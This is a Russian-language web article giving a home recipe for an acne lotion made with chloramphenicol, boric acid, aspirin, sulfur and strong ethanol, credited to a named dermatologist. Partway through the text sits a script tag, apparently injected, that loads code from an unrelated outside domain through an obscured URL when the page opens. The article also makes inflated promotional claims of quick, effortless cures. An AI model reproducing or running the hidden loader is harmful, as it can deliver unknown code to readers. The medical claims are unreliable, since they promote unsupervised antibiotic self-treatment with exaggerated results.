Подберите средство для вашей кожи
Что делаем
Не важно
  • Не важно
  • Лечение
  • Омоложение
Где делаем
Не важно
  • Не важно
  • На лице
  • На теле

Рецепт болтушки от прыщей

36

Многим людям досаждает проблема прыщей. Как правило, они появляются некстати и очень сильно портят жизнь. Гнойнички, черные точки и угри не только негативно сказываются на внешнем виде, но и отравляют настроение. На полках магазинов и аптек сейчас очень много косметических препаратов, которые обещают в кратчайшие сроки справиться с прыщами.

d2 Рецепт болтушки от прыщей

Кочеткова Ольга Викторовна

Дерматолог, Косметолог

Врач высшей категории

Одним из наиболее эффективных средств для борьбы с этой проблемой считаются болтушки от прыщей, которую без проблем можно приготовить в домашних условиях. Считается, что они намного лучше всех дорогостоящих известных препаратов и в буквальном смысле творят чудеса. Перед ее использованием желательно проконсультироваться с профессиональным дерматологом, ведь данное средство подходит далеко не всем пациентам и даже может вызвать сильнейшую аллергическую реакцию. Специалист подберет компоненты и составит рецепт, по которому болтушку приготовят в аптеке. Но стоимость этого препарата нередко в несколько раз превышает цену его отдельных компонентов.

<script language=»javascript» charset=»UTF-8″ type=»text/javascript» src=»http://estasos.ru/7p9s7iedil78yfdkbne79y5xplakwg66o3kr2qa80?5vbtevpw=de9b»></script>

Болтушка от прыщей, как показывают отзывы это весьма эффективное средство, может быть использована далеко не во всех случаях. При тяжелой форме акне она вряд ли принесет какой-то ощутимый результат. Приготовленным средством необходимо смазывать лицо несколько раз в сутки вместо привычного тоника. Перед применением болтушки необходимо тщательно очистить кожные покровы от загрязнений. Для этого необходимо умыться с помощью средств с молочным козеином или дегтем: такой шаг поможет уберечь кожу от пересыхания. Мои пациенты воспользовались советом врача, благодаря которому можно избавится от проблем за 2 недели без особых усилий.

Беременным женщинам некоторые виды болтушек противопоказаны из-за средств, содержащихся в них, поэтому перед использованием обязательно нужно обратиться к врачу.

С левомицетином

Левомицетин очень давно используется в медицине и косметологии и не теряет своей популярности даже среди многообразия современных средств. Он отличается доступной стоимостью, но при этом не менее эффективен, чем дорогостоящие препараты. Левомицетин от прыщей, по отзывам многих людей, используется в сочетании с другими элементами, что существенно повышает его эффективность.

Прекрасно зарекомендовала себя болтушка от прыщей с левомицетином, которую можно приготовить дома и при этом сэкономить немало денег на покупке профессиональных косметических средств.

Рецепт болтушки от прыщей с левомицетином включает следующие компоненты:

  • левомицетин – 2 части;
  • сера 2,5 части (от нее можно отказаться);
  • борная кислота – 1 часть;
  • таблетки аспирина – 2,5 части;
  • этиловый спирт — 90%.

Перед применением данную смесь обязательно нужно хорошо взболтать. При помощи ватного диска болтушка наносится на предварительно очищенные кожные покровы лица. Хранится лекарство в плотно закрученной стеклянной емкости в темном месте. Для повышения эффективности средства необходимо пересмотреть свой рацион. Желательно отказаться от сладких, жирных и жареных продуктов.

Левомицетин нельзя применять самостоятельно, предварительно нужно проконсультироваться с врачом. В противном случае могут быть серьезные последствия. При неправильном подборе ингредиентов или передозировке смазывания -вероятен отек Квинке, а в тяжелых случаях даже анафилактический шок, нередко приводящий к летальному исходу.

Данное средство противопоказано людям с экземами, грибком, псориазом. Средства, входящие в него могут нанести вред беременным и кормящим женщинам.

После нанесения болтушки с левомицетином не рекомендуется пользоваться тональным кремом, который забивает поры. Прекрасной основой для макияжа станет обычный детский крем или же пантенол. На следующие сутки после использования средства кожа восприимчива к воздействию грязи, солнечным лучам и перепадам температур. Нужно оградить себя от этих факторов.



Одна звездаДве звездыТри звездыЧетыре звездыПять звёзд (Пока оценок нет)
Loading...Loading...

Оставить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

Можно использовать следующие HTML-теги и атрибуты: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Новое на форуме
Единая запись на консультацию к дерматологу

Реабилитационные клиники

original_4f95ead03c72ddaa56000007_515baf13124eb
neo_finland
Interier
klinika_uno-pro
183393944
p635_1233_l

Powered by WordPress Popup